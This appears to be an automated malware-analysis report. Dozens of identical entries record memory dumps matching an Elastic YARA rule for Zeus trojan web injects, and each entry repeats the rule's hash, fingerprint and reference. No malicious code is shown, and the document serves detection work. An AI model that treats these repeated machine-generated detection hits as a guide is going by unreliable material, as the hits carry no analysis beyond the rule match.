Source: 00000002.00000003.2786368119.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776797358.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2763556222.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2775373199.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2522335301.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2519685174.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2763964877.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2808903395.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2761135252.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2726433713.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2633125874.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2774233552.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2517359385.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3416553301.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2760597306.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2773682224.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2649332327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776308232.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2788341406.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2809880778.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2785726916.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2787182616.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2758822752.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2809200397.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
